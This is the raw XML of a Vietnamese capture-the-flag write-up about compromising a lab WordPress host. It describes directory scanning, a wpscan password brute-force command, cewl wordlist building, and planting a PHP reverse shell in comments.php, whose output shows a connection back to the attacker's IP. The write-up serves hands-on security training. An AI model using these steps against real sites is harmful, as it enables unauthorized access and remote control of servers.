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A65067" w14:textId="1D3A8854" w:rsidR="002F49FE" w:rsidRPr="00953EA7" w:rsidRDefault="00173A0C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F7C913" wp14:editId="46C2B13F">
            <wp:extent cx="4727806" cy="42454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641" cy="42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CBAD5" w14:textId="56E85FAF" w:rsidR="00173A0C" w:rsidRPr="00953EA7" w:rsidRDefault="00173A0C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BABA267" w14:textId="515D2F69" w:rsidR="00173A0C" w:rsidRPr="00953EA7" w:rsidRDefault="00E86720">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26B842A8" wp14:editId="53B86100">
            <wp:extent cx="4747949" cy="2982686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3257" cy="299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0B86A" w14:textId="73DFC293" w:rsidR="00471E26" w:rsidRPr="00953EA7" w:rsidRDefault="00471E26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A387C35" w14:textId="709BA0D9" w:rsidR="00471E26" w:rsidRPr="00953EA7" w:rsidRDefault="0019438A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>Scan tiếp thư mục retro bằng common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D768BC9" w14:textId="67DD67AC" w:rsidR="0019438A" w:rsidRPr="00953EA7" w:rsidRDefault="0019438A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DF2087" w14:textId="63BC613E" w:rsidR="0019438A" w:rsidRPr="00953EA7" w:rsidRDefault="009F0BE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953E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45AB143" wp14:editId="5F96DE49">
            <wp:extent cx="4060371" cy="3656503"/>
            <wp:effectExtent l="0" t="0" r="381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737" cy="366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773E" w14:textId="004A58B3" w:rsidR="009F0BE3" w:rsidRPr="00953EA7" w:rsidRDefault="009F0BE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F396FF8" w14:textId="7638D566" w:rsidR="009F0BE3" w:rsidRPr="00953EA7" w:rsidRDefault="009F0BE3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>Mình sẽ kiểm tra các thư mục bị ẩn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F9474" w14:textId="56CF145C" w:rsidR="009F0BE3" w:rsidRPr="00953EA7" w:rsidRDefault="009F0BE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614CEEC1" w14:textId="341FCC25" w:rsidR="009F0BE3" w:rsidRPr="00953EA7" w:rsidRDefault="009F0BE3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>Trang index.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E7761E" w14:textId="44AB2C19" w:rsidR="009F0BE3" w:rsidRPr="00953EA7" w:rsidRDefault="009F0BE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C794B1" w14:textId="39DA89FC" w:rsidR="009F0BE3" w:rsidRPr="00953EA7" w:rsidRDefault="009F0BE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="540D7379" wp14:editId="60533DC0">
            <wp:extent cx="4332514" cy="32899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11429" r="19408"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4332872" cy="329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C5EDE" w14:textId="5D7CE4A8" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031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lastRenderedPageBreak/>
        <w:t>Trang wp-admin chuyển hướng mình về localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F91231" w14:textId="48B78B07" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031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>Trang wp-content không có gì hết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D5F63" w14:textId="0DCC6533" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031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>Trang wp-includes không cho mình truy cập (403 - Forbidden)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75530494" w14:textId="0CE3A4AB" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1430F430" w14:textId="46714562" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031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>Trang index.php có chức năng login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027FABC1" w14:textId="76ECCBD9" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755541A3" w14:textId="4098BA56" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12536D98" wp14:editId="4142F408">
            <wp:extent cx="2763520" cy="2622736"/>
            <wp:effectExtent l="0" t="0" r="508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9" t="17299" r="32228" b="12057"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2765146" cy="2624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15081" w14:textId="20774DDB" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF28ED2" w14:textId="181132AA" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031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>Ứng dụng đang dùng thư viện wordpress, mình sẽ dùng wpscan</w:t>
      </w:r>
      <w:r w:rsidR="008C1ADB" w:rsidRPr="00953EA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> để liệt kê plugins, themes và users</w:t>
      </w:r>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15865894" w14:textId="5E00EFF1" w:rsidR="00E43031" w:rsidRPr="00953EA7" w:rsidRDefault="00E43031">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104F7D70" w14:textId="65198139" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="007451ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C12311" wp14:editId="35142D54">
            <wp:extent cx="4787900" cy="482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C3E6A" w14:textId="77777777" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00AD3038">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D551DC1" w14:textId="1E7F5987" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00AD3038">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0731D29B" wp14:editId="1B068B44">
            <wp:extent cx="5943600" cy="4940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4026" w14:textId="264A15AD" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00AD3038">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032E6059" w14:textId="77777777" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00AD3038">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F781637" w14:textId="2532E949" w:rsidR="00332D01" w:rsidRPr="00953EA7" w:rsidRDefault="00AD3038">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71682F2B" wp14:editId="574471F6">
            <wp:extent cx="5943600" cy="1747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C5CC8" w14:textId="3168460E" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00AD3038">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11A59E72" wp14:editId="694FB1E3">
            <wp:extent cx="5943600" cy="1882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52D8" w14:textId="4E38A1D0" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00AD3038">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA49A14" w14:textId="43DC1C80" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00610790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 xml:space="preserve">Mình sẽ lướt qua ứng dụng web, thấy ông Wade đang comment trên Ready Player One: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A931C3" w14:textId="77777777" w:rsidR="00610790" w:rsidRPr="00953EA7" w:rsidRDefault="00610790">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCECB86" w14:textId="6FA45B13" w:rsidR="00AD3038" w:rsidRPr="00953EA7" w:rsidRDefault="00610790">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F14EA29" wp14:editId="5AEA7556">
            <wp:extent cx="3755571" cy="118710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985" cy="11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6EB41" w14:textId="2EBBE020" w:rsidR="00610790" w:rsidRPr="00953EA7" w:rsidRDefault="00610790">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7891F859" w14:textId="3BB73F6E" w:rsidR="00610790" w:rsidRPr="00953EA7" w:rsidRDefault="00D424CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CD58D82" wp14:editId="07B16689">
            <wp:extent cx="3755390" cy="1774983"/>
            <wp:effectExtent l="0" t="0" r="381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507" cy="178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93881" w14:textId="7CC962A9" w:rsidR="00D424CA" w:rsidRPr="00953EA7" w:rsidRDefault="00D424CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA276AD" w14:textId="77777777" w:rsidR="00D062DD" w:rsidRDefault="00D424CA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 xml:space="preserve">Mình tìm được mật khẩu tiềm năng: parzival. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E6133" w14:textId="77777777" w:rsidR="00D062DD" w:rsidRDefault="00D062DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B098E2C" w14:textId="5705C2B0" w:rsidR="00D062DD" w:rsidRDefault="00D062D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còn 1 cách khác để tìm mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB9DD5" w14:textId="130AB979" w:rsidR="00D062DD" w:rsidRDefault="00D062DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7A2123" w14:textId="586C2EF6" w:rsidR="00D062DD" w:rsidRDefault="00D062D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Vì chúng ta có username và khả năng tấn công của chúng ta chỉ giới hạn ở một số cách. Chúng ta sẽ tạo 1 wordlist từ Wordpress blog. Để làm được điều này, chúng ta sẽ dùng công cụ cewl</w:t>
      </w:r>
      <w:r w:rsidR="00737EA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Chúng ta sẽ quét với độ sâu 3 (-d 3) và độ dài tối thiểu của từ là 7 (-m 7), sau đó lưu từ vào trong 1 tập tin (-w retrowl.txt), nhắm vào Url http://10.10.187.172/retro/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49526F01" w14:textId="76924F62" w:rsidR="00737EA8" w:rsidRDefault="00737EA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5026B25" wp14:editId="20584D18">
            <wp:extent cx="5943600" cy="14941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4F3F" w14:textId="447EE7FA" w:rsidR="00737EA8" w:rsidRDefault="00737EA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53962DDF" w14:textId="4AEC6F37" w:rsidR="00737EA8" w:rsidRDefault="00737EA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Sau khi chúng ta tạo 1 wordlist, chúng ta sẽ bruteforce trang đăng nhập của Wordpress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5159DE" w14:textId="1D2CFE63" w:rsidR="00737EA8" w:rsidRDefault="00737EA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6227CFE3" w14:textId="462BB939" w:rsidR="00414350" w:rsidRPr="00414350" w:rsidRDefault="00414350">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414350">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wpscan --url http://10.10.187.172/retro --passwords retrowl.txt --usernames wade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A9F95D" w14:textId="35C94785" w:rsidR="00D062DD" w:rsidRDefault="00D062DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C988D2" w14:textId="04CE30A2" w:rsidR="001A1531" w:rsidRDefault="001A15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71A7FF2" wp14:editId="0D6F604D">
            <wp:extent cx="4013200" cy="558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5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7557" w14:textId="77777777" w:rsidR="001A1531" w:rsidRDefault="001A1531">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DAD745" w14:textId="1B0ACEBD" w:rsidR="00D424CA" w:rsidRPr="00953EA7" w:rsidRDefault="00D424CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử đăng nhập vào wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DAABA" w14:textId="5F0B6DC5" w:rsidR="00D424CA" w:rsidRPr="00953EA7" w:rsidRDefault="00D424CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547F145A" w14:textId="5E8F5EC8" w:rsidR="00D424CA" w:rsidRPr="00953EA7" w:rsidRDefault="00481106">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3425EA75" wp14:editId="0F84391A">
            <wp:extent cx="5311775" cy="2906486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6" t="16997" r="3284" b="4744"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5312975" cy="290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40250" w14:textId="0F4980DF" w:rsidR="00481106" w:rsidRPr="00953EA7" w:rsidRDefault="00481106">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E19B45" w14:textId="150D303A" w:rsidR="00481106" w:rsidRPr="00953EA7" w:rsidRDefault="00953EA7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953EA7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A48CC4" wp14:editId="1E935413">
            <wp:extent cx="4604385" cy="2699463"/>
            <wp:effectExtent l="0" t="0" r="571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02" t="15532" r="8425" b="11795"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4604657" cy="2699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FD3F3" w14:textId="3272D191" w:rsidR="00953EA7" w:rsidRPr="00953EA7" w:rsidRDefault="00953EA7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1410E7B3" w14:textId="691F9944" w:rsidR="00D424CA" w:rsidRPr="006C0C4C" w:rsidRDefault="00953EA7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0C4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách leo thang đặc quyền trong Wordpress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C47C6F3" w14:textId="68A86524" w:rsidR="00953EA7" w:rsidRDefault="00953EA7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3D0280" w14:textId="64596F21" w:rsidR="00953EA7" w:rsidRDefault="006C0C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vào Appearance </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0C4C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Editor: chỉnh file </w:t>
      </w:r>
      <w:r w:rsidR="009B036E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:r w:rsidR="004E2BA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php (reverse shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC66EB" w14:textId="7364E8A9" w:rsidR="006C0C4C" w:rsidRDefault="006C0C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013E8A71" w14:textId="12700549" w:rsidR="006C0C4C" w:rsidRDefault="006C0C4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59EE67" wp14:editId="1FFEF0FE">
            <wp:extent cx="5322436" cy="3020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7" t="15271" r="8081" b="3402"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5324306" cy="302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78BA9" w14:textId="5ED587D6" w:rsidR="006C0C4C" w:rsidRDefault="006C0C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C91095" w14:textId="604752A5" w:rsidR="006C0C4C" w:rsidRDefault="00FD70B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Thực thi file: </w:t>
      </w:r>
      <w:r w:rsidR="009B036E" w:rsidRPr="00C20582">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.10.187.172/retro/index.php/comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A7C21" w14:textId="39DD9DEC" w:rsidR="009B036E" w:rsidRDefault="009B036E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06002CA5" w14:textId="0AD6554F" w:rsidR="00C20582" w:rsidRDefault="00C2058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đã thử 3 loại reverse-shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9372AB" w14:textId="5985FA1D" w:rsidR="00C20582" w:rsidRPr="00C20582" w:rsidRDefault="00C20582" w:rsidP="00C2058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C20582">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows-php-reverse-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D92319" w14:textId="57A1095C" w:rsidR="00C20582" w:rsidRPr="00C20582" w:rsidRDefault="00C20582" w:rsidP="00C2058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C20582">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php-reverse-shell của PentestMonkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0E69D" w14:textId="2AFB9C45" w:rsidR="00C20582" w:rsidRPr="00C20582" w:rsidRDefault="00C20582" w:rsidP="00C2058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C20582">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>php-reverse-shell của Ivan Sincek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9A50A" w14:textId="77777777" w:rsidR="00C20582" w:rsidRDefault="00C20582">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4810985E" w14:textId="77777777" w:rsidR="009B036E" w:rsidRDefault="009B036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Trang web báo lỗi: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFD922" w14:textId="77777777" w:rsidR="009B036E" w:rsidRDefault="009B036E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33825CA0" w14:textId="7399C025" w:rsidR="009B036E" w:rsidRPr="00C20582" w:rsidRDefault="009B036E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20582">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WARNING: Failed to daemonise. This is quite common and not fatal. Successfully opened reverse shell to 10.8.55.148:1234 ERROR: Shell process terminated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D40A0" w14:textId="36553DA0" w:rsidR="009B036E" w:rsidRDefault="009B036E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F29F492" w14:textId="6E9136C2" w:rsidR="009B036E" w:rsidRDefault="00C2058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B75596" wp14:editId="4BCE0689">
            <wp:extent cx="5943600" cy="14344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AD15" w14:textId="0672DB2B" w:rsidR="00C20582" w:rsidRDefault="00C20582">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
